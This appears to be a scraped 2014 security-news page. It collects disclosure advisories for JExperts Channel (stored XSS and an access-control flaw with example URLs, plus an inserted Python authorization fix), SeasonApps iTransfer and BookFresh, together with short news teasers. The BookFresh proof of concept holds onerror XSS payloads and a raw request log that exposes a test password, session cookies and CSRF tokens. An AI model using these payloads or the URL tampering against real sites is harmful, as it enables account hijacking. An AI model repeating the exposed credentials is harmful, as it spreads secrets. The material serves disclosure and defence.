
CVE-2014-8557 - JExperts Tecnologia - Channel Software Cross Site Scripting Issues

CVE-2014-8557 - JExperts Tecnologia / Channel Software Cross Site Scripting Issues
Vendor Notified: 2014-10-27


INTRODUCTION:

The Channel Platform is enterprise project management software developed by the
Brazilian company JExperts Technology and deployed at thousands of private-sector
and government clients. The software consists of an integrated set of solutions
in the areas of strategy, projects and processes.


This problem was confirmed in the following version of Channel; other versions
may also be affected.

Version: 5.0.33_CCB


DETAILS:

The Channel software is affected by multiple stored cross-site scripting issues.
The variable "usuario.nome" in the page
".../channel/usuario.do?action=editarUsuario&id=XXX" (reachable from the
"Ferramentas" menu, submenu "alterar dados pessoais") and the variable
"titulo.form" in the page "...channel/ticket.do?action=novoChamado" (reachable
from the "[incluir solicitação...]" menu) do not sanitize input data, allowing an
attacker to store malicious JavaScript code in the page.



CREDITS:

This vulnerability was discovered and researched by Luciano Pedreira
(a.k.a. shark)

CVE-2014-8558 - JExperts Tecnologia - Channel Software Escalation Access Issues

CVE-2014-8558 - JExperts Tecnologia / Channel Software Escalation Access Issues
Vendor Notified: 2014-10-27


INTRODUCTION:

The Channel Platform is enterprise project management software developed by the
Brazilian company JExperts Technology and deployed at thousands of private-sector
and government clients. The software consists of an integrated set of solutions
in the areas of strategy, projects and processes.


This problem was confirmed in the following version of Channel; other versions
may also be affected.

Version: 5.0.33_CCB


DETAILS:

The Channel software is affected by an access escalation issue. The variables
"action" and "key" can be manipulated via the GET method (by passing parameters
in the URL itself), so that a user with restricted access, such as "read only",
can reach any other user's call-center request and even create or edit content
posted by other users.

Once logged in as any user of the system, simply changing the action ("action"
variable) and the key value ("key" variable) gives unauthorized access to other
users' areas.


Examples:

[1] set action to "acompanhar" and key to "201"
http://<server>/channel/ticket.do?action=acompanhar&key=201


[2] set action to "editar" and key to "100"
http://<server>/channel/ticket.do?action=editar&key=100
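The defect above is a missing server-side authorization check: "action" and "key" select what is requested, but nothing verifies that the logged-in user may perform that action on that object. The following is an added example (not JExperts' code) of how a ticket.do-style handler can enforce both a function-level check (may this role perform "editar" at all?) and an object-level check (does this ticket belong to the requester?) on every request. The User and Ticket classes, the role table, the sample tickets and the placeholder host "channel.example" are all constructed for the example; only the action names "acompanhar" and "editar" and the keys 100 and 201 come from the advisory.

```python
# Added example (not JExperts' code): server-side authorization for a
# ticket.do-style endpoint driven by "action" and "key" query parameters.
# User, Ticket, ACTIONS_BY_ROLE and the sample data are assumptions.
from dataclasses import dataclass
from typing import Dict, FrozenSet, Optional
from urllib.parse import parse_qs, urlparse


@dataclass(frozen=True)
class User:
    name: str
    roles: FrozenSet[str]   # e.g. {"readonly"}, {"requester"}, {"agent"}


@dataclass(frozen=True)
class Ticket:
    key: int
    owner: str              # user who opened the call-center request
    title: str


# Constructed sample data using the keys from the advisory's example URLs.
TICKETS: Dict[int, Ticket] = {
    100: Ticket(key=100, owner="alice", title="Printer offline"),
    201: Ticket(key=201, owner="bob", title="VPN access"),
}

# Function-level policy: which actions each role may perform at all.
ACTIONS_BY_ROLE: Dict[str, FrozenSet[str]] = {
    "readonly":  frozenset({"acompanhar"}),            # follow/view only
    "requester": frozenset({"acompanhar", "editar"}),  # view and edit own tickets
    "agent":     frozenset({"acompanhar", "editar"}),  # call-center staff
}


def action_allowed(user: User, action: str) -> bool:
    """Function-level check: at least one of the user's roles permits this action."""
    return any(action in ACTIONS_BY_ROLE.get(role, frozenset()) for role in user.roles)


def object_allowed(user: User, ticket: Ticket) -> bool:
    """Object-level check: agents may reach any ticket, everyone else only their own."""
    return "agent" in user.roles or ticket.owner == user.name


def authorize_ticket_request(user: User, url: str) -> str:
    """Return one of 'allow', 'deny-action', 'deny-object', 'not-found'.

    Both checks run on every request: the client-supplied "action" and "key"
    say what is being asked for but never decide whether it is permitted.
    """
    params = parse_qs(urlparse(url).query)
    action = params.get("action", [""])[0]
    if not action_allowed(user, action):
        return "deny-action"            # unknown actions are denied here too
    try:
        key = int(params.get("key", [""])[0])
    except ValueError:
        return "not-found"
    ticket = TICKETS.get(key)
    if ticket is None:
        return "not-found"
    if not object_allowed(user, ticket):
        # A production service would answer this exactly like "not-found"
        # so that the response does not confirm which keys exist.
        return "deny-object"
    return "allow"


def handle_ticket_request(user: User, url: str) -> Optional[Ticket]:
    """Return the ticket only when the request is fully authorized."""
    if authorize_ticket_request(user, url) != "allow":
        return None
    key = int(parse_qs(urlparse(url).query)["key"][0])
    return TICKETS[key]


if __name__ == "__main__":
    readonly_bob = User("bob", frozenset({"readonly"}))
    base = "http://channel.example/channel/ticket.do"   # placeholder host
    print(authorize_ticket_request(readonly_bob, f"{base}?action=acompanhar&key=201"))  # allow
    print(authorize_ticket_request(readonly_bob, f"{base}?action=editar&key=201"))      # deny-action
    print(authorize_ticket_request(readonly_bob, f"{base}?action=acompanhar&key=100"))  # deny-object
```

The point of the two separate checks is that fixing only one of them leaves the bug: a role table alone still lets a read-only user follow someone else's ticket, and an ownership check alone still lets a requester edit where only viewing was intended.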



CREDITS:

This vulnerability was discovered and researched by Luciano Pedreira
(a.k.a. shark)

Drupageddon vs. Suhosin

Automated attacks began compromising Drupal 7 websites that were not patched or updated to Drupal 7.32 within hours of the announcement of SA-CORE-2014-005 - Drupal core - SQL injection. You should proceed under the assumption that every Drupal 7 website was compromised unless updated or patched before Oct 15th, 11pm UTC, that is 7 hours after the announcement.

Is this statement true? Would all sites be vulnerable to these automated attacks? What if Suhosin is installed, which kills many general attack vectors? The short answer is that it kills all the PoCs which we saw on the internet and that have been reported, but a dedicated attacker can navigate around Suhosin and still exploit this bug.


more here.........http://www.sektioneins.de/en/blog/14-11-06-drupageddon-vs-suhosin.html

Tech Support website infects your computer before you even dial in

If you ever need help with your computer you may be interested in remote tech support.

As we have written many times on this blog before, the road to finding a legitimate company is very treacherous.

more here.........https://blog.malwarebytes.org/exploits-2/2014/11/tech-support-website-infects-your-computer-before-you-even-dial-in/

System Calls Make the World Go Round

I hate to break it to you, but a user application is a helpless brain in a vat

Every interaction with the outside world is mediated by the kernel through system calls. If an app saves a file, writes to the terminal, or opens a TCP connection, the kernel is involved. Apps are regarded as highly suspicious: at best a bug-ridden mess, at worst the malicious brain of an evil genius.

more here..........http://duartes.org/gustavo/blog/post/system-calls/

WireLurker for Windows

Yesterday we published a whitepaper introducing WireLurker, the first malware attacking both non-jailbroken and jailbroken iOS devices from a Mac OS X system. Shortly after we released the paper, Jaime Blasco from AlienVault Labs notified us that he’d found a Windows executable file that contains WireLurker’s command and control server address. We analyzed and investigated the sample and have confirmed that it is an older version of WireLurker.

more here..........http://researchcenter.paloaltonetworks.com/2014/11/wirelurker-windows/

SeasonApps iTransfer 1.1 - Persistent UI Vulnerability

Document Title:
===============
SeasonApps iTransfer 1.1 - Persistent UI Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1347


Release Date:
=============
2014-10-27


Vulnerability Laboratory ID (VL-ID):
====================================
1347


Common Vulnerability Scoring System:
====================================
2.5


Product & Service Introduction:
===============================
Do you want to access your PhotoLibrary's files on the website? Do you want to transfer files from PC to iDevice easily and
read or send them everywhere? Then iTransfer will give all of this to you.

1. You can get all photos and videos in the Photo Library of your device.
2. Wifi Sharing! This makes our life easier, doesn't it?
3. A file box for you where you can store and get files in the document directory of the App. You can also manage the files via Wifi Sharing!
4. Super File Manager: you can open files in document formats such as pdf, doc, ppt, txt, rtf, png, jpg… and media formats such as mp3, mp4 and so on.
5. Zip and Unzip, which will make managing your local files easier.
6. You can share the files with your friends by email.
7. You can access the files on this app via USB and iTunes.
8. Support for iOS7
9. Added an upload feature to Library Sharing; you can upload images to your photo library now.
10. Added file management features to Local Sharing, such as creating directories and deleting files (directories).
11. Added an authentication feature to the sharing feature; you can browse your shares safely now!
12. Added a feedback feature; please send us your advice or bug reports. Thanks!

(Copy of the Homepage: https://itunes.apple.com/us/app/itransferpro-transfer-photos/id777151284 )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent input validation vulnerability in the official iTransferPro v1.1 iOS mobile application.


Vulnerability Disclosure Timeline:
==================================
2014-10-27:     Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
SeasonApps iTransfer
Product: iTransfer - iOS Mobile Web Application (Wifi) 1.1


Exploitation Technique:
=======================
Local


Severity Level:
===============
Medium


Technical Details & Description:
================================
An application-side input validation web vulnerability has been discovered in the official SeasonApps iTransferPro v1.1 iOS mobile application.
The vulnerability allows a local attacker to inject their own script code as a payload into the application side of the vulnerable service function or module.

The vulnerability is located in the albumname value. Local attackers with low-privileged device user accounts are able to manipulate the albumname
values by using the wifi sync function in the `Share Photo Library` module. The attack vector is persistent on the application side and the injection
request method is an app sync. The issue allows persistent malicious script code to be delivered to the front end of the wifi photo library interface.

The security risk of the application-side web vulnerability is estimated as medium with a CVSS (Common Vulnerability Scoring System) count of 2.5.
Exploitation of the application-side web vulnerability requires a low-privileged web-application user account and low or medium user interaction.
Successful exploitation of the vulnerability results in persistent phishing mails, session hijacking, persistent external redirects to malicious
sources and application-side manipulation of affected or connected module context.

Request Method(s):
                                        [+] Sync

Vulnerable Module(s):
                                        [+] Share Photo Library

Vulnerable Parameter(s):
                                        [+] items - group (albumname)

Affected Module(s):
                                        [+] Wifi Interface - Share Photo Library Index (http://localhost:8888/)


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by local attackers with a low-privileged device user account and low or medium user interaction.
For a security demonstration or to reproduce the security vulnerability, follow the information and steps provided below.

PoC: Wifi Interface - Share Photo Library Index (http://localhost:8888/)

<html><head><meta name="viewport" content="width=device-width, initial-scale=1.0" http-equiv="Content-Type"><title>iTransfer</title><style>html
{background-color:#eeeeee} body { background-color:#FFFFFF; font-family:Tahoma,Arial,Helvetica,sans-serif; font-size:18x; margin-left:5%;
margin-right:5%; border:3px groove #006600; padding:15px; } </style></head><body><h2>Enjoy  iTransfer</h2>
<bq>You Can Access Files of your Photo Library Now :)</bq><script type="text/javascript" src="/jquery.js"></script>
<script type="text/javascript" src="/fileuploader.js"></script>         <link href="fileuploader.css" rel="stylesheet"
type="text/css"><p></p><div id="file-uploader-div"><div class="qq-uploader"><div style="display: none;" class="qq-upload-drop-area">
<span>drop files here to upload</span></div><div style="position: relative; overflow: hidden; direction: ltr;" class="qq-upload-button">upload a file
<input style="position: absolute; right: 0px; top: 0px; font-family: Arial; font-size: 118px; margin: 0px; padding: 0px; cursor: pointer; opacity: 0;"
name="file" multiple="multiple" type="file"></div><ul class="qq-upload-list"></ul></div></div><p></p><script language="javascript">
$(function(){                               var uploader = new qq.FileUploader({
element:document.getElementById("file-uploader-div"),
 action: "/",
debug: false,
allowedExtensions: ["jpg","png","JPG","PNG","bmp","BMP"],
template: '<div class="qq-uploader">' +
'<div class="qq-upload-drop-area"><span>drop files here to upload</span></div>' +
'<div class="qq-upload-button">upload a file</div>' +
'<ul class="qq-upload-list"></ul>' +                                '</div>',                               });                               });
</script><br><label color="red"><font size="2" color="red">(Notice: The pictures you upload will appear when you share the photo library next time)</font></label>
<br><link href="/bootstrap.css" rel="stylesheet">         <script src="/bootstrap.min.js"></script><h3>All Groups</h3><ul class="thumbnails"><li class="span2">
<div class="thumbnail" style="text-align: center;">
<a target="_blank" href="/group/7BADE58E-C286-43D8-8CE2-4415C4DF35CA">
<img src="7BADE58E-C286-43D8-8CE2-4415C4DF35CA.png" height="150" width="150">
<span stype="white-space: nowrap;">>>"<[PERSISTENT INJECTED SCRIPT CODE EXECUTION!] 1items</span></a></div>
<a target="_blank" href="/group/7BADE58E-C286-43D8-8CE2-4415C4DF35CA">
</a></li><li class="span2"><a target="_blank" href="/group/7BADE58E-C286-43D8-8CE2-4415C4DF35CA">
</a><div class="thumbnail" style="text-align: center;"><a target="_blank" href="/group/7BADE58E-C286-43D8-8CE2-4415C4DF35CA">
</a><a target="_blank" href="/group/F8F7120B-9058-4B64-B6EF-59DB570F8872">
<img src="F8F7120B-9058-4B64-B6EF-59DB570F8872.png" height="150" width="150">
<span stype="white-space: nowrap;">Photos 3items</span>
</a></div><a target="_blank" href="/group/F8F7120B-9058-4B64-B6EF-59DB570F8872">
</a></li></ul></body></html>


Reference(s):
http://localhost:8888/
http://localhost:8888/group/


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure restriction of the foldername/albumname input fields.
Encode the input and parse the output of the name values in the wifi interface to prevent persistent script code execution.


Security Risk:
==============
The security risk of the application-side input validation web vulnerability in the wifi interface is estimated as medium(-). (CVSS 2.5)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                                      - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com         - research@vulnerability-lab.com                        - admin@evolution-sec.com
Section:    magazine.vulnerability-db.com       - vulnerability-lab.com/contact.php                     - evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                         - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php            - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

                                Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™



--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

COMPANY: Evolution Security GmbH
BUSINESS: www.evolution-sec.com

BookFresh - Persistent Clients Invite Vulnerability

Document Title:
===============
BookFresh - Persistent Clients Invite Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1351


Release Date:
=============
2014-10-28


Vulnerability Laboratory ID (VL-ID):
====================================
1351


Common Vulnerability Scoring System:
====================================
3.9


Product & Service Introduction:
===============================
BookFresh is an innovative scheduling software program that sets the standard for 21st century appointment management and creation for small businesses.
Bookfresh connects small business owners and customers instantly. As a small business owner, you already know that a strong work ethic and uncompromised
customer service is the key to building a solid client base, but sometimes a little magic and innovation is all you need to watch your profits soar.
The BookFresh scheduling software offers scheduling solutions directly to service professionals and service brands, as well as APIs, enterprise services
and reseller solutions to online publishers who have a presence with an SMB audience.

Let BookFresh Work for You! Whether you are a handyman, a sales consultant, a personal trainer or even a pet sitter, BookFresh knows that the key to your
success is making it easy for clients to schedule appointments with you. We live in a 24/7 world, which means that sometimes potential clients, even
existing clients, want to be able to access your company at two o`clock in the morning. BookFresh makes this possible! The software we created makes it
easy to accept online appointments from new and existing clients. Whether you are interested in growing your small business or simply want to upgrade your
services for existing clients; our scheduling software can help you achieve these goals for your small business.

(Copy of the Vendor Homepage: https://www.bookfresh.com/about-us )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent encoding web vulnerability in the official BookFresh online payment web-application & api.


Vulnerability Disclosure Timeline:
==================================
2014-10-23: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2014-10-24: Vendor Notification (BookFresh Security Team - Bug Bounty Program)
2014-10-27: Vendor Response/Feedback (BookFresh Security Team - Bug Bounty Program)
2014-10-28: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
BookFresh LLC
Product: BookFresh - Web Application & API 2014 Q4


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A persistent input validation & mail encoding vulnerability has been discovered in the official BookFresh web-application & api.
The vulnerability allows a remote attacker to inject their own malicious script code into the application side of the vulnerable service module.

The security vulnerability is located in the `phone`, `from` and `message` input values of the `cindex.php/clients` module. Remote attackers
are able to send a PUT request that results in persistent script code in BookFresh service notification mails. The attacker registers a user
account and is then able to have script code executed in the "invite people" notification mails of the BookFresh service. The attack vector of
the issue is on the application side of the online service, and the request method used to inject the code is `PUT`.

The security risk of the persistent vulnerability is estimated as medium with a CVSS (Common Vulnerability Scoring System) count of 3.9.
Exploitation of the vulnerability requires a low-privileged application user account and low user interaction. Successful exploitation of the
vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects via mail and persistent manipulation of
affected or connected module context.

Vulnerable Module(s):
                                [+] Index > Add Clients (Invite)

Vulnerable Parameter(s):
                                [+] phone
                                [+] from
                                [+] message

Affected Service(s):
                                [+] Invite Mail Notification Service (noreply@bookfresh.com)


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with a low-privileged application user account and low user interaction.
For a security demonstration or to reproduce the security vulnerability, follow the information and steps provided below.

Vulnerable Module:      Index > Add Clients (Invite)
Vulnerable URL:         https://www.bookfresh.com/cindex.php/clients#9f29673d878097fd23de3bae1523da44

Test Account:           bkm@evolution-sec.com
Test Password:          chaos666
Date/Time:              24.10.2014 14:35-14:50

Manual steps to reproduce the security vulnerability ...
1. Register an account and log in to the BookFresh online-service application
2. Open the "add client" module to invite another user account
3. Inject your own script code payload into the phone, message and from input fields
4. Send the invite to another BookFresh user or to an arbitrary email address by using the save function
Note: After the PUT request, the injected script code in the vulnerable values bypasses the validation through the BookFresh api
5. The target mailbox receives a notification from the BookFresh service mail (noreply@bookfresh.com) that executes the script code on the application side in the context of the vulnerable values
6. Successful reproduction of the application-side (persistent) security vulnerability!


PoC: Exploit

<table class="mainframe">
<tbody>
<tr>
<td align="center">
<table border="0" cellspacing="20" cellpadding="0" width="580" bgcolor="#ffffff">
<tbody><tr><td class="mainbar" align="left" valign="top">
<!-- This  mail body use in profile when we send message to customer by the click of the 'send'button and it the format of
body is changed while working on ready book proj and backup is on svn before date 1 june 2007 and on developer manish tomar's local system-->

Hi <img src=x onerror=alert(/PTEST/)</script> <img src=x onerror=alert(/PTEST/)</script>,               # Username is secure encoded!
<br /><br />You have received a new Customer Message from your BookFresh profile page.
<br /><table>  <tr>
    <td align=right>From: </td><td>>"<%20 <img src=x onerror=alert(/PTEST/)</script></td>               # wrong encoded!
  </tr><tr><td align=right>Email: </td><td>admin@vulnerability-lab.com</td>
  </tr><tr>
    <td align=right>Phone: </td><td>>"<%20 <img src=x onerror=alert(/PTEST/)</script></td>              # wrong encoded!
  </tr><tr><td align=right>Message: </td><td>>"<%20 <img src=x onerror=alert(/PTEST/)</script></td>     # wrong encoded!
  </tr></table>
<br /><br /></td></tr></tbody></table></td></tr><tr>
<td align="center">
<span style="font-size: 8pt; color: #808080; font-family: arial">Questions? Contact us at <a class="footer_link"
href="http://support.bookfresh.com/customer/portal/emails/new?utm_campaign=bf_trans%3A%3A14-Oct-24&utm_source=send_message&utm_medium=email">Customer Support</a>.<br />
Booking Services provided by © BookFresh, LLC</span><br/>
<span style="font-size: 8pt; color: #808080; font-family: arial"><a class="footer_link" href="privacy.html">Read</a> the BookFresh Privacy Policy.</span><br/>
<span style="font-size: 8pt; color: #808080; font-family: arial"><a class="footer_link" href="index.html?view=opt_out">Click here to unsubscribe, or be removed,</a> from our email list.</span><br/>
<span style="font-size: 8pt; color: #808080; font-family: arial">BookFresh and the BookFresh Logo are registered trademarks of <span>BookFresh, LLC.</span></span><br/>
</td></tr></tbody></table>
<!-- tname: email_SendMessage.tpl tid: 26 tab: A send date: 2014-10-24-->
<img src="http://email.bookfresh.com/wf/open?upn=uY64WvidYmA-2BK5R2ZgrqaysavcJU6rIwi-2BTH2m-2BnvrF7gIIWPH8UWHQ5IPkwAumsOQpAjYk9iXfKleJZs4F5L-2FrbX5cy6kOq-2F-2BgLKDDRdr0RsDKQLFl-2FONiWVLGGjc6Q9CXiSP5cPniDQsO7skfUHsaYZHVjrca69HQVChE7UbhbTtoTNujSdCVKJShEWbpQZ-2Bfw85nmnSDkQRQZxQjW2OE1c9m8t3c60RvypYObWH3rBpE0z11TXmjvuWNW3D4Q" alt="" width="1" height="1"
border="0" style="height:1px !important;width:1px !important;border-width:0 !important;margin-top:0 !important;margin-bottom:0 !important;margin-right:0 !important;margin-left:0
!important;padding-top:0 !important;padding-bottom:0 !important;padding-right:0 !important;padding-left:0 !important;"/>
</body>
</html>
</body>
</html>


--- PoC Session Logs [PUT] (Phone, Message & Email Values) ---
15:29:24.953[936ms][total 936ms] Status: 200[OK]
PUT https://www.bookfresh.com/cindex.php/backbone_api/clients/9f29673d878097fd23de3bae1523da44 Load Flags[LOAD_BACKGROUND  ] Größe des Inhalts[656] Mime Type[application/json]
   Request Header:
      Host[www.bookfresh.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
      Accept[application/json, text/javascript, */*; q=0.01]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Content-Type[application/json; charset=UTF-8]
      X-CSRF-Token[dd5d7d46c5aa14d736fab7accaa26892]
      X-Requested-With[XMLHttpRequest]
      Referer[https://www.bookfresh.com/cindex.php/clients]
      Content-Length[1566]
      Cookie[exp_last_visit=1098793409; exp_last_activity=1414153682; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A7%3A%22pricing%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; exp_stashid=a%3A2%3A%7Bs%3A2%3A%22id%22%3Bs%3A40%3A%22a6f1b5568526e667fc23b9df8b909c4033ccd4d9%22%3Bs%3A2%3A%22dt%22%3Bi%3A1414153409%3B%7D; __utma=172549936.1040555376.1414153707.1414153707.1414154524.2; __utmc=172549936; __utmz=172549936.1414154524.2.2.utmcsr=send_invite|utmccn=bf_trans::14-Oct-24|utmcmd=email; PHPSESSID2=fba6f3efafeba128a152ccac7f385a62; optimizelySegments=%7B%7D; optimizelyEndUserId=oeu1414153426800r0.9022819634031048; optimizelyBuckets=%7B%7D; user_segment=Prospect; 0=; 1=; ci_csrf_token=dd5d7d46c5aa14d736fab7accaa26892; hitlog_previous_view=ajax; ajs_user=%7B%22id%22%3A%22336105318%22%2C%22traits%22%3A%7B%22email%22%3A%22bkm%40evolution-sec.com%22%2C%22created%22%3A1414178914%2C%22firstName%22%3A%22%26lt%3Bimg%20src%3Dx%20onerror%3Dalert(%2FPTEST%2F)%26lt%3B%2Fscript%26gt%3B%22%2C%22lastName%22%3A%22%26lt%3Bimg%20src%3Dx%20onerror%3Dalert(%2FPTEST%2F)%26lt%3B%2Fscript%26gt%3B%22%2C%22AccountType%22%3A%22Freebie%22%2C%22Partner%22%3A%22Site%22%2C%22V2Enabled%22%3A%22yes%22%2C%22BusinessCategory%22%3A%22auto%22%7D%7D; StaffFilterActive=; FCView=agendaWeek; FCWeekends=true; wcsid=papxuKWK1AQ9pZOE4491G5P3JNLJ6b1T; hblid=ZjHg0Fr4qFgx2rsW4491G5P3JN8yLoJ1; _oklv=1414154886305%2CpapxuKWK1AQ9pZOE4491G5P3JNLJ6b1T; olfsk=olfsk7646853271129184; _okbk=cd4%3Dtrue%2Cvi5%3D0%2Cvi4%3D1414153790074%2Cvi3%3Dactive%2Cvi2%3Dfalse%2Cvi1%3Dfalse%2Ccd8%3Dchat%2Ccd6%3D0%2Ccd5%3Daway%2Ccd3%3Dfalse%2Ccd2%3D0%2Ccd1%3D0%2C; _ok=9558-780-10-9044; kvcd=1414154695823; km_ai=wRxGgAKNuV%2F1hVqbidBhjL91IRg%3D; km_uq=; km_lv=x; 
mp_2197551b77685f5afde96bfaeb663423_mixpanel=%7B%22distinct_id%22%3A%20%22149421cca1bb15-04ab1d7c297b6f8-41534336-1fa400-149421cca1ca98%22%2C%22Site%22%3A%20%22v3%22%2C%22%24initial_referrer%22%3A%20%22https%3A%2F%2Fhackerone.com%2Fbookfresh%22%2C%22%24initial_referring_domain%22%3A%20%22hackerone.com%22%2C%22__alias%22%3A%20%22336105318%22%2C%22mp_name_tag%22%3A%20%22bkm%40evolution-sec.com%22%2C%22AccountType%22%3A%20%22Freebie%22%2C%22Partner%22%3A%20%22Site%22%2C%22V2Enabled%22%3A%20%22yes%22%2C%22BusinessCategory%22%3A%20%22auto%22%2C%22%24created%22%3A%20%222014-10-24T19%3A28%3A34.000Z%22%2C%22%24email%22%3A%20%22bkm%40evolution-sec.com%22%2C%22%24first_name%22%3A%20%22%26lt%3Bimg%20src%3Dx%20onerror%3Dalert(%2FPTEST%2F)%26lt%3B%2Fscript%26gt%3B%22%2C%22%24last_name%22%3A%20%22%26lt%3Bimg%20src%3Dx%20onerror%3Dalert(%2FPTEST%2F)%26lt%3B%2Fscript%26gt%3B%22%7D]
      Connection[keep-alive]
   POST-Daten:
      {"id":"9f29673d878097fd23de3bae1523da44","deleted":"0","date_entered":"2014-10-24 05:43:12","date_modified":"2014-10-24 12:43:00","mask_flags":"0","email":"submit@vulnerability-lab.com","encrypted_password":null,"is_valid":"0","is_merchant":"0","first_name":"<img src[x onerror=alert(/PTEST/)</script>","last_name":"<img src=x onerror=alert(/PTEST/)</script>","birthday":"1973-10-23T22:00:00.000Z","company_name":"<img src=x onerror=alert(/PTEST/)</script>","address1":"<img src=x onerror=alert(/PTEST/)</script>","address2":null,"city":"blabla","state":"","country":null,"zipcode":"23451","phone":"46436436","cellphone":"<img src=x onerror=alert(/PTEST/)</script>","phone_type":"0","cellphone_type":"0","paypal_userid":null,"owner_id":"459c17cba4ecf98084e9a1f24d319144","private":"1","notes":"<img src=x onerror=alert(/PTEST/)</script>","timezone":"America/Los_Angeles","invited":"0","user_photo":null,"enabled":"1","reminder_emails_enable":"0","reminder_emails_time":"24","reminder_emails_text":null,"appt_emails_enable":false,"reminder_emails_merchant":"0","review_emails_enable":"1","review_emails_text":null,"act_type_id":"1","is_admin":"0","is_comp":"0","last_login":"2014-10-24 12:43:00","has_welcome_call":"0","user_photo_id":null,"is_affiliate_invitee":"0","email_bounced":"0","email_bounce_date":"0000-01-01 00:00:00","is_mobile":"0","reviews_by_rating":"0","reminder_sms_enable":"0","reset_password_token":null,"reset_password_sent_at":null,"remember_created_at":null,"uid":null,"failed_attempts":"0","locked_at":null,"appt_sms_enable":false,"actions":[]}]
   Response Header:
      Server[nginx/1.4.4]
      Date[Fri, 24 Oct 2014 13:29:37 GMT]
      Content-Type[application/json]
      Content-Length[656]
      Connection[keep-alive]
      X-Powered-By[PHP/5.3.28]
      Set-Cookie[ci_csrf_token=dd5d7d46c5aa14d736fab7accaa26892; expires=Fri, 24-Oct-2014 15:29:37 GMT; path=/; httponly]
      p3p[CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"]
      Expires[Thu, 19 Nov 1981 08:52:00 GMT]
      Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
      Pragma[no-cache]
      status[200]
      Vary[Accept-Encoding,User-Agent]
      Content-Encoding[gzip]

15:29:26.325[321ms][total 321ms] Status: 200[OK]
GET https://www.bookfresh.com/cindex.php/backbone_api/clients/find?query=&offset=0 Load Flags[LOAD_BACKGROUND  ] Größe des Inhalts[1012] Mime Type[application/json]
   Request Header:
      Host[www.bookfresh.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
      Accept[*/*]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      X-CSRF-Token[dd5d7d46c5aa14d736fab7accaa26892]
      X-Requested-With[XMLHttpRequest]
      Referer[https://www.bookfresh.com/cindex.php/clients]
